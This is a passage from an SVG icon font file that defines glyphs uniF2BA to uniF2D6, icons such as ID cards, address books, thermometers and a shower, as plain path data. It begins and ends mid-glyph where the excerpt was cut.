d="M1201 298q0 57 -5.5 107t-21 100.5t-39.5 86t-64 58t-91 22.5q-6 -4 -33.5 -20.5t-42.5 -24.5t-40.5 -20t-49 -17t-46.5 -5t-46.5 5t-49 17t-40.5 20t-42.5 24.5t-33.5 20.5q-51 0 -91 -22.5t-64 -58t-39.5 -86t-21 -100.5t-5.5 -107q0 -73 42 -121.5t103 -48.5h576
q61 0 103 48.5t42 121.5zM1028 892q0 108 -76.5 184t-183.5 76t-183.5 -76t-76.5 -184q0 -107 76.5 -183t183.5 -76t183.5 76t76.5 183zM1664 352v-192q0 -14 -9 -23t-23 -9h-96v-224q0 -66 -47 -113t-113 -47h-1216q-66 0 -113 47t-47 113v1472q0 66 47 113t113 47h1216
q66 0 113 -47t47 -113v-224h96q14 0 23 -9t9 -23v-192q0 -14 -9 -23t-23 -9h-96v-128h96q14 0 23 -9t9 -23v-192q0 -14 -9 -23t-23 -9h-96v-128h96q14 0 23 -9t9 -23z" />
    <glyph glyph-name="uniF2BA" unicode="&#xf2ba;" horiz-adv-x="1664" 
d="M1028 892q0 -107 -76.5 -183t-183.5 -76t-183.5 76t-76.5 183q0 108 76.5 184t183.5 76t183.5 -76t76.5 -184zM980 672q46 0 82.5 -17t60 -47.5t39.5 -67t24 -81t11.5 -82.5t3.5 -79q0 -67 -39.5 -118.5t-105.5 -51.5h-576q-66 0 -105.5 51.5t-39.5 118.5q0 48 4.5 93.5
t18.5 98.5t36.5 91.5t63 64.5t93.5 26h5q7 -4 32 -19.5t35.5 -21t33 -17t37 -16t35 -9t39.5 -4.5t39.5 4.5t35 9t37 16t33 17t35.5 21t32 19.5zM1664 928q0 -13 -9.5 -22.5t-22.5 -9.5h-96v-128h96q13 0 22.5 -9.5t9.5 -22.5v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-96v-128h96
q13 0 22.5 -9.5t9.5 -22.5v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-96v-224q0 -66 -47 -113t-113 -47h-1216q-66 0 -113 47t-47 113v1472q0 66 47 113t113 47h1216q66 0 113 -47t47 -113v-224h96q13 0 22.5 -9.5t9.5 -22.5v-192zM1408 -96v1472q0 13 -9.5 22.5t-22.5 9.5h-1216
q-13 0 -22.5 -9.5t-9.5 -22.5v-1472q0 -13 9.5 -22.5t22.5 -9.5h1216q13 0 22.5 9.5t9.5 22.5z" />
    <glyph glyph-name="uniF2BB" unicode="&#xf2bb;" horiz-adv-x="2048" 
d="M1024 405q0 64 -9 117.5t-29.5 103t-60.5 78t-97 28.5q-6 -4 -30 -18t-37.5 -21.5t-35.5 -17.5t-43 -14.5t-42 -4.5t-42 4.5t-43 14.5t-35.5 17.5t-37.5 21.5t-30 18q-57 0 -97 -28.5t-60.5 -78t-29.5 -103t-9 -117.5t37 -106.5t91 -42.5h512q54 0 91 42.5t37 106.5z
M867 925q0 94 -66.5 160.5t-160.5 66.5t-160.5 -66.5t-66.5 -160.5t66.5 -160.5t160.5 -66.5t160.5 66.5t66.5 160.5zM1792 416v64q0 14 -9 23t-23 9h-576q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h576q14 0 23 9t9 23zM1792 676v56q0 15 -10.5 25.5t-25.5 10.5h-568
q-15 0 -25.5 -10.5t-10.5 -25.5v-56q0 -15 10.5 -25.5t25.5 -10.5h568q15 0 25.5 10.5t10.5 25.5zM1792 928v64q0 14 -9 23t-23 9h-576q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h576q14 0 23 9t9 23zM2048 1248v-1216q0 -66 -47 -113t-113 -47h-352v96q0 14 -9 23t-23 9
h-64q-14 0 -23 -9t-9 -23v-96h-768v96q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-96h-352q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1728q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2BC" unicode="&#xf2bc;" horiz-adv-x="2048" 
d="M1024 405q0 -64 -37 -106.5t-91 -42.5h-512q-54 0 -91 42.5t-37 106.5t9 117.5t29.5 103t60.5 78t97 28.5q6 -4 30 -18t37.5 -21.5t35.5 -17.5t43 -14.5t42 -4.5t42 4.5t43 14.5t35.5 17.5t37.5 21.5t30 18q57 0 97 -28.5t60.5 -78t29.5 -103t9 -117.5zM867 925
q0 -94 -66.5 -160.5t-160.5 -66.5t-160.5 66.5t-66.5 160.5t66.5 160.5t160.5 66.5t160.5 -66.5t66.5 -160.5zM1792 480v-64q0 -14 -9 -23t-23 -9h-576q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h576q14 0 23 -9t9 -23zM1792 732v-56q0 -15 -10.5 -25.5t-25.5 -10.5h-568
q-15 0 -25.5 10.5t-10.5 25.5v56q0 15 10.5 25.5t25.5 10.5h568q15 0 25.5 -10.5t10.5 -25.5zM1792 992v-64q0 -14 -9 -23t-23 -9h-576q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h576q14 0 23 -9t9 -23zM1920 32v1216q0 13 -9.5 22.5t-22.5 9.5h-1728q-13 0 -22.5 -9.5
t-9.5 -22.5v-1216q0 -13 9.5 -22.5t22.5 -9.5h352v96q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-96h768v96q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-96h352q13 0 22.5 9.5t9.5 22.5zM2048 1248v-1216q0 -66 -47 -113t-113 -47h-1728q-66 0 -113 47t-47 113v1216q0 66 47 113
t113 47h1728q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2BD" unicode="&#xf2bd;" horiz-adv-x="1792" 
d="M1523 197q-22 155 -87.5 257.5t-184.5 118.5q-67 -74 -159.5 -115.5t-195.5 -41.5t-195.5 41.5t-159.5 115.5q-119 -16 -184.5 -118.5t-87.5 -257.5q106 -150 271 -237.5t356 -87.5t356 87.5t271 237.5zM1280 896q0 159 -112.5 271.5t-271.5 112.5t-271.5 -112.5
t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5zM1792 640q0 -182 -71 -347.5t-190.5 -286t-285.5 -191.5t-349 -71q-182 0 -348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="uniF2BE" unicode="&#xf2be;" horiz-adv-x="1792" 
d="M896 1536q182 0 348 -71t286 -191t191 -286t71 -348q0 -181 -70.5 -347t-190.5 -286t-286 -191.5t-349 -71.5t-349 71t-285.5 191.5t-190.5 286t-71 347.5t71 348t191 286t286 191t348 71zM1515 185q149 205 149 455q0 156 -61 298t-164 245t-245 164t-298 61t-298 -61
t-245 -164t-164 -245t-61 -298q0 -250 149 -455q66 327 306 327q131 -128 313 -128t313 128q240 0 306 -327zM1280 832q0 159 -112.5 271.5t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5z" />
    <glyph glyph-name="uniF2C0" unicode="&#xf2c0;" 
d="M1201 752q47 -14 89.5 -38t89 -73t79.5 -115.5t55 -172t22 -236.5q0 -154 -100 -263.5t-241 -109.5h-854q-141 0 -241 109.5t-100 263.5q0 131 22 236.5t55 172t79.5 115.5t89 73t89.5 38q-79 125 -79 272q0 104 40.5 198.5t109.5 163.5t163.5 109.5t198.5 40.5
t198.5 -40.5t163.5 -109.5t109.5 -163.5t40.5 -198.5q0 -147 -79 -272zM768 1408q-159 0 -271.5 -112.5t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5t-112.5 271.5t-271.5 112.5zM1195 -128q88 0 150.5 71.5t62.5 173.5q0 239 -78.5 377t-225.5 145
q-145 -127 -336 -127t-336 127q-147 -7 -225.5 -145t-78.5 -377q0 -102 62.5 -173.5t150.5 -71.5h854z" />
    <glyph glyph-name="uniF2C1" unicode="&#xf2c1;" horiz-adv-x="1280" 
d="M1024 278q0 -64 -37 -107t-91 -43h-512q-54 0 -91 43t-37 107t9 118t29.5 104t61 78.5t96.5 28.5q80 -75 188 -75t188 75q56 0 96.5 -28.5t61 -78.5t29.5 -104t9 -118zM870 797q0 -94 -67.5 -160.5t-162.5 -66.5t-162.5 66.5t-67.5 160.5t67.5 160.5t162.5 66.5
t162.5 -66.5t67.5 -160.5zM1152 -96v1376h-1024v-1376q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5zM1280 1376v-1472q0 -66 -47 -113t-113 -47h-960q-66 0 -113 47t-47 113v1472q0 66 47 113t113 47h352v-96q0 -14 9 -23t23 -9h192q14 0 23 9t9 23v96h352
q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2C2" unicode="&#xf2c2;" horiz-adv-x="2048" 
d="M896 324q0 54 -7.5 100.5t-24.5 90t-51 68.5t-81 25q-64 -64 -156 -64t-156 64q-47 0 -81 -25t-51 -68.5t-24.5 -90t-7.5 -100.5q0 -55 31.5 -93.5t75.5 -38.5h426q44 0 75.5 38.5t31.5 93.5zM768 768q0 80 -56 136t-136 56t-136 -56t-56 -136t56 -136t136 -56t136 56
t56 136zM1792 288v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704q14 0 23 9t9 23zM1408 544v64q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1792 544v64q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23
v-64q0 -14 9 -23t23 -9h192q14 0 23 9t9 23zM1792 800v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704q14 0 23 9t9 23zM128 1152h1792v96q0 14 -9 23t-23 9h-1728q-14 0 -23 -9t-9 -23v-96zM2048 1248v-1216q0 -66 -47 -113t-113 -47h-1728
q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1728q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2C3" unicode="&#xf2c3;" horiz-adv-x="2048" 
d="M896 324q0 -55 -31.5 -93.5t-75.5 -38.5h-426q-44 0 -75.5 38.5t-31.5 93.5q0 54 7.5 100.5t24.5 90t51 68.5t81 25q64 -64 156 -64t156 64q47 0 81 -25t51 -68.5t24.5 -90t7.5 -100.5zM768 768q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136z
M1792 352v-64q0 -14 -9 -23t-23 -9h-704q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h704q14 0 23 -9t9 -23zM1408 608v-64q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h320q14 0 23 -9t9 -23zM1792 608v-64q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v64
q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1792 864v-64q0 -14 -9 -23t-23 -9h-704q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h704q14 0 23 -9t9 -23zM1920 32v1120h-1792v-1120q0 -13 9.5 -22.5t22.5 -9.5h1728q13 0 22.5 9.5t9.5 22.5zM2048 1248v-1216q0 -66 -47 -113t-113 -47
h-1728q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1728q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2C4" unicode="&#xf2c4;" horiz-adv-x="1792" 
d="M1255 749q0 318 -105 474.5t-330 156.5q-222 0 -326 -157t-104 -474q0 -316 104 -471.5t326 -155.5q74 0 131 17q-22 43 -39 73t-44 65t-53.5 56.5t-63 36t-77.5 14.5q-46 0 -79 -16l-49 97q105 91 276 91q132 0 215.5 -54t150.5 -155q67 149 67 402zM1645 117h117
q3 -27 -2 -67t-26.5 -95t-58 -100.5t-107 -78t-162.5 -32.5q-71 0 -130.5 19t-105.5 56t-79 78t-66 96q-97 -27 -205 -27q-150 0 -292.5 58t-253 158.5t-178 249t-67.5 317.5q0 170 67.5 319.5t178.5 250.5t253.5 159t291.5 58q121 0 238.5 -36t217 -106t176 -164.5
t119.5 -219t43 -261.5q0 -190 -80.5 -347.5t-218.5 -264.5q47 -70 93.5 -106.5t104.5 -36.5q61 0 94 37.5t38 85.5z" />
    <glyph glyph-name="uniF2C5" unicode="&#xf2c5;" horiz-adv-x="2304" 
d="M453 -101q0 -21 -16 -37.5t-37 -16.5q-1 0 -13 3q-63 15 -162 140q-225 284 -225 676q0 341 213 614q39 51 95 103.5t94 52.5q19 0 35 -13.5t16 -32.5q0 -27 -63 -90q-98 -102 -147 -184q-119 -199 -119 -449q0 -281 123 -491q50 -85 136 -173q2 -3 14.5 -16t19.5 -21
t17 -20.5t14.5 -23.5t4.5 -21zM1796 33q0 -29 -17.5 -48.5t-46.5 -19.5h-1081q-26 0 -45 19t-19 45q0 29 17.5 48.5t46.5 19.5h1081q26 0 45 -19t19 -45zM1581 644q0 -134 -67 -233q-25 -38 -69.5 -78.5t-83.5 -60.5q-16 -10 -27 -10q-7 0 -15 6t-8 12q0 9 19 30t42 46
t42 67.5t19 88.5q0 76 -35 130q-29 42 -46 42q-3 0 -3 -5q0 -12 7.5 -35.5t7.5 -36.5q0 -22 -21.5 -35t-44.5 -13q-66 0 -66 76q0 15 1.5 44t1.5 44q0 25 -10 46q-13 25 -42 53.5t-51 28.5q-5 0 -7 -0.5t-3.5 -2.5t-1.5 -6q0 -2 16 -26t16 -54q0 -37 -19 -68t-46 -54
t-53.5 -46t-45.5 -54t-19 -68q0 -98 42 -160q29 -43 79 -63q16 -5 17 -10q1 -2 1 -5q0 -16 -18 -16q-6 0 -33 11q-119 43 -195 139.5t-76 218.5q0 55 24.5 115.5t60 115t70.5 108.5t59.5 113.5t24.5 111.5q0 53 -25 94q-29 48 -56 64q-19 9 -19 21q0 20 41 20q50 0 110 -29
q41 -19 71 -44.5t49.5 -51t33.5 -62.5t22 -69t16 -80q0 -1 3 -17.5t4.5 -25t5.5 -25t9 -27t11 -21.5t14.5 -16.5t18.5 -5.5q23 0 37 14t14 37q0 25 -20 67t-20 52t10 10q27 0 93 -70q72 -76 102.5 -156t30.5 -186zM2304 615q0 -274 -138 -503q-19 -32 -48 -72t-68 -86.5
t-81 -77t-74 -30.5q-16 0 -31 15.5t-15 31.5q0 15 29 50.5t68.5 77t48.5 52.5q183 230 183 531q0 131 -20.5 235t-72.5 211q-58 119 -163 228q-2 3 -13 13.5t-16.5 16.5t-15 17.5t-15 20t-9.5 18.5t-4 19q0 19 16 35.5t35 16.5q70 0 196 -169q98 -131 146 -273t60 -314
q2 -42 2 -64z" />
    <glyph glyph-name="uniF2C6" unicode="&#xf2c6;" horiz-adv-x="1792" 
d="M1189 229l147 693q9 44 -10.5 63t-51.5 7l-864 -333q-29 -11 -39.5 -25t-2.5 -26.5t32 -19.5l221 -69l513 323q21 14 32 6q7 -5 -4 -15l-415 -375v0v0l-16 -228q23 0 45 22l108 104l224 -165q64 -36 81 38zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71
t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="uniF2C7" unicode="&#xf2c7;" horiz-adv-x="1024" 
d="M640 192q0 -80 -56 -136t-136 -56t-136 56t-56 136q0 60 35 110t93 71v907h128v-907q58 -21 93 -71t35 -110zM768 192q0 77 -34 144t-94 112v768q0 80 -56 136t-136 56t-136 -56t-56 -136v-768q-60 -45 -94 -112t-34 -144q0 -133 93.5 -226.5t226.5 -93.5t226.5 93.5
t93.5 226.5zM896 192q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 182 128 313v711q0 133 93.5 226.5t226.5 93.5t226.5 -93.5t93.5 -226.5v-711q128 -131 128 -313zM1024 768v-128h-192v128h192zM1024 1024v-128h-192v128h192zM1024 1280v-128h-192
v128h192z" />
    <glyph glyph-name="uniF2C8" unicode="&#xf2c8;" horiz-adv-x="1024" 
d="M640 192q0 -80 -56 -136t-136 -56t-136 56t-56 136q0 60 35 110t93 71v651h128v-651q58 -21 93 -71t35 -110zM768 192q0 77 -34 144t-94 112v768q0 80 -56 136t-136 56t-136 -56t-56 -136v-768q-60 -45 -94 -112t-34 -144q0 -133 93.5 -226.5t226.5 -93.5t226.5 93.5
t93.5 226.5zM896 192q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 182 128 313v711q0 133 93.5 226.5t226.5 93.5t226.5 -93.5t93.5 -226.5v-711q128 -131 128 -313zM1024 768v-128h-192v128h192zM1024 1024v-128h-192v128h192zM1024 1280v-128h-192
v128h192z" />
    <glyph glyph-name="uniF2C9" unicode="&#xf2c9;" horiz-adv-x="1024" 
d="M640 192q0 -80 -56 -136t-136 -56t-136 56t-56 136q0 60 35 110t93 71v395h128v-395q58 -21 93 -71t35 -110zM768 192q0 77 -34 144t-94 112v768q0 80 -56 136t-136 56t-136 -56t-56 -136v-768q-60 -45 -94 -112t-34 -144q0 -133 93.5 -226.5t226.5 -93.5t226.5 93.5
t93.5 226.5zM896 192q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 182 128 313v711q0 133 93.5 226.5t226.5 93.5t226.5 -93.5t93.5 -226.5v-711q128 -131 128 -313zM1024 768v-128h-192v128h192zM1024 1024v-128h-192v128h192zM1024 1280v-128h-192
v128h192z" />
    <glyph glyph-name="uniF2CA" unicode="&#xf2ca;" horiz-adv-x="1024" 
d="M640 192q0 -80 -56 -136t-136 -56t-136 56t-56 136q0 60 35 110t93 71v139h128v-139q58 -21 93 -71t35 -110zM768 192q0 77 -34 144t-94 112v768q0 80 -56 136t-136 56t-136 -56t-56 -136v-768q-60 -45 -94 -112t-34 -144q0 -133 93.5 -226.5t226.5 -93.5t226.5 93.5
t93.5 226.5zM896 192q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 182 128 313v711q0 133 93.5 226.5t226.5 93.5t226.5 -93.5t93.5 -226.5v-711q128 -131 128 -313zM1024 768v-128h-192v128h192zM1024 1024v-128h-192v128h192zM1024 1280v-128h-192
v128h192z" />
    <glyph glyph-name="uniF2CB" unicode="&#xf2cb;" horiz-adv-x="1024" 
d="M640 192q0 -80 -56 -136t-136 -56t-136 56t-56 136q0 79 56 135.5t136 56.5t136 -56.5t56 -135.5zM768 192q0 77 -34 144t-94 112v768q0 80 -56 136t-136 56t-136 -56t-56 -136v-768q-60 -45 -94 -112t-34 -144q0 -133 93.5 -226.5t226.5 -93.5t226.5 93.5t93.5 226.5z
M896 192q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 182 128 313v711q0 133 93.5 226.5t226.5 93.5t226.5 -93.5t93.5 -226.5v-711q128 -131 128 -313zM1024 768v-128h-192v128h192zM1024 1024v-128h-192v128h192zM1024 1280v-128h-192v128h192z" />
    <glyph glyph-name="uniF2CC" unicode="&#xf2cc;" horiz-adv-x="1920" 
d="M1433 1287q10 -10 10 -23t-10 -23l-626 -626q-10 -10 -23 -10t-23 10l-82 82q-10 10 -10 23t10 23l44 44q-72 91 -81.5 207t46.5 215q-74 71 -176 71q-106 0 -181 -75t-75 -181v-1280h-256v1280q0 104 40.5 198.5t109.5 163.5t163.5 109.5t198.5 40.5q106 0 201 -41
t166 -115q94 39 197 24.5t185 -79.5l44 44q10 10 23 10t23 -10zM1344 1024q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1600 896q-26 0 -45 19t-19 45t19 45t45 19t45 -19t19 -45t-19 -45t-45 -19zM1856 1024q26 0 45 -19t19 -45t-19 -45t-45 -19
t-45 19t-19 45t19 45t45 19zM1216 896q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1408 832q0 26 19 45t45 19t45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45zM1728 896q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1088 768
q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1344 640q-26 0 -45 19t-19 45t19 45t45 19t45 -19t19 -45t-19 -45t-45 -19zM1600 768q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1216 512q-26 0 -45 19t-19 45t19 45t45 19t45 -19
t19 -45t-19 -45t-45 -19zM1472 640q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1088 512q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1344 512q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1216 384
q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1088 256q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19z" />
    <glyph glyph-name="uniF2CD" unicode="&#xf2cd;" horiz-adv-x="1792" 
d="M1664 448v-192q0 -169 -128 -286v-194q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v118q-63 -22 -128 -22h-768q-65 0 -128 22v-110q0 -17 -9.5 -28.5t-22.5 -11.5h-64q-13 0 -22.5 11.5t-9.5 28.5v186q-128 117 -128 286v192h1536zM704 864q0 -14 -9 -23t-23 -9t-23 9
t-9 23t9 23t23 9t23 -9t9 -23zM768 928q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM704 992q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM832 992q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM768 1056q0 -14 -9 -23t-23 -9t-23 9
t-9 23t9 23t23 9t23 -9t9 -23zM704 1120q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM1792 608v-64q0 -14 -9 -23t-23 -9h-1728q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v640q0 106 75 181t181 75q108 0 184 -78q46 19 98 12t93 -39l22 22q11 11 22 0l42 -42
q11 -11 0 -22l-314 -314q-11 -11 -22 0l-42 42q-11 11 0 22l22 22q-36 46 -40.5 104t23.5 108q-37 35 -88 35q-53 0 -90.5 -37.5t-37.5 -90.5v-640h1504q14 0 23 -9t9 -23zM896 1056q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM832 1120q0 -14 -9 -23t-23 -9
t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM768 1184q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM960 1120q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM896 1184q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM832 1248q0 -14 -9 -23
t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM1024 1184q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM960 1248q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23zM1088 1248q0 -14 -9 -23t-23 -9t-23 9t-9 23t9 23t23 9t23 -9t9 -23z" />
    <glyph glyph-name="uniF2CE" unicode="&#xf2ce;" 
d="M994 344q0 -86 -17 -197q-31 -215 -55 -313q-22 -90 -152 -90t-152 90q-24 98 -55 313q-17 110 -17 197q0 168 224 168t224 -168zM1536 768q0 -240 -134 -434t-350 -280q-8 -3 -15 3t-6 15q7 48 10 66q4 32 6 47q1 9 9 12q159 81 255.5 234t96.5 337q0 180 -91 330.5
t-247 234.5t-337 74q-124 -7 -237 -61t-193.5 -140.5t-128 -202t-46.5 -240.5q1 -184 99 -336.5t257 -231.5q7 -3 9 -12q3 -21 6 -45q1 -9 5 -32.5t6 -35.5q1 -9 -6.5 -15t-15.5 -2q-148 58 -261 169.5t-173.5 264t-52.5 319.5q7 143 66 273.5t154.5 227t225 157.5t272.5 70
q164 10 315.5 -46.5t261 -160.5t175 -250.5t65.5 -308.5zM994 800q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5zM1282 768q0 -122 -53.5 -228.5t-146.5 -177.5q-8 -6 -16 -2t-10 14q-6 52 -29 92q-7 10 3 20
q58 54 91 127t33 155q0 111 -58.5 204t-157.5 141.5t-212 36.5q-133 -15 -229 -113t-109 -231q-10 -92 23.5 -176t98.5 -144q10 -10 3 -20q-24 -41 -29 -93q-2 -9 -10 -13t-16 2q-95 74 -148.5 183t-51.5 234q3 131 69 244t177 181.5t241 74.5q144 7 268 -60t196.5 -187.5
t72.5 -263.5z" />
    <glyph glyph-name="uniF2D0" unicode="&#xf2d0;" horiz-adv-x="1792" 
d="M256 128h1280v768h-1280v-768zM1792 1248v-1216q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1472q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2D1" unicode="&#xf2d1;" horiz-adv-x="1792" 
d="M1792 224v-192q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v192q0 66 47 113t113 47h1472q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2D2" unicode="&#xf2d2;" horiz-adv-x="2048" 
d="M256 0h768v512h-768v-512zM1280 512h512v768h-768v-256h96q66 0 113 -47t47 -113v-352zM2048 1376v-960q0 -66 -47 -113t-113 -47h-608v-352q0 -66 -47 -113t-113 -47h-960q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h608v352q0 66 47 113t113 47h960q66 0 113 -47
t47 -113z" />
    <glyph glyph-name="uniF2D3" unicode="&#xf2d3;" horiz-adv-x="1792" 
d="M1175 215l146 146q10 10 10 23t-10 23l-233 233l233 233q10 10 10 23t-10 23l-146 146q-10 10 -23 10t-23 -10l-233 -233l-233 233q-10 10 -23 10t-23 -10l-146 -146q-10 -10 -10 -23t10 -23l233 -233l-233 -233q-10 -10 -10 -23t10 -23l146 -146q10 -10 23 -10t23 10
l233 233l233 -233q10 -10 23 -10t23 10zM1792 1248v-1216q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1472q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2D4" unicode="&#xf2d4;" horiz-adv-x="1792" 
d="M1257 425l-146 -146q-10 -10 -23 -10t-23 10l-169 169l-169 -169q-10 -10 -23 -10t-23 10l-146 146q-10 10 -10 23t10 23l169 169l-169 169q-10 10 -10 23t10 23l146 146q10 10 23 10t23 -10l169 -169l169 169q10 10 23 10t23 -10l146 -146q10 -10 10 -23t-10 -23
l-169 -169l169 -169q10 -10 10 -23t-10 -23zM256 128h1280v1024h-1280v-1024zM1792 1248v-1216q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1472q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2D5" unicode="&#xf2d5;" horiz-adv-x="1792" 
d="M1070 358l306 564h-654l-306 -564h654zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="uniF2D6" unicode="&#xf2d6;" horiz-adv-x="1794" 
d="M1291 1060q-15 17 -35 8.5t-26 -28.5t5 -38q14 -17 40 -14.5t34 20.5t-18 52zM895 814q-8 -8 -19.5 -8t-18.5 8q-8 8 -8 19t8 18q7 8 18.5 8t19.5 -8q7 -7 7 -18t-7 -19zM1060 740l-35 -35q-12 -13 -29.5 -13t-30.5 13l-38 38q-12 13 -12 30t12 30l35 35q12 12 29.5 12
t30.5 -12l38 -39q12 -12 12 -29.5t-12 -29.5zM951 870q-7 -8 -18.5 -8t-19.5 8q-7 8 -7 19t7 19q8 8 19 8t19 -8t8 -19t-8 -19zM1354 968q-34 -64 -107.5 -85.5t-127.5 16.5q-38 28 -61 66.5t-21 87.5t39 92t75.5 53t70.5 -5t70 -51q2 -2 13 -12.5t14.5 -13.5t13 -13.5
t12.5 -15.5t10 -15.5t8.5 -18t4 -18.5t1 -21t-5 -22t-9.5 -24zM1555 486q3 20 -8.5 34.5t-27.5 21.5t-33 17t-23 20q-40 71 -84 98.5t-113 11.5q19 13 40 18.5t33 4.5l12 -1q2 45 -34 90q6 20 6.5 40.5t-2.5 30.5l-3 10q43 24 71 65t34 91q10 84 -43 150.5t-137 76.5
q-60 7 -114 -18.5t-82 -74.5q-30 -51 -33.5 -101t14.5 -87t43.5 -64t56.5 -42q-45 4 -88 36t-57 88q-28 108 32 222q-16 21 -29 32q-50 0 -89 -19q19 24 42 37t36 14l13 1q0 50 -13 78q-10 21 -32.5 28.5t-47 -3.5t-37.5 -40q2 4 4 7q-7 -28 -6.5 -75.5t19 -117t48.5 -122.5
q-25 -14 -47 -36q-35 -16 -85.5 -70.5t-84.5 -101.5l-33 -46q-90 -34 -181 -125.5t-75 -162.5q1 -16 11 -27q-15 -12 -30 -30q-21 -25 -21 -54t21.5 -40t63.5 6q41 19 77 49.5t55 60.5q-2 2 -6.5 5t-20.5 7.5t-33 3.5q23 5 51 12.5t40 10t27.5 6t26 4t23.5 0.5q14 -7 22 34
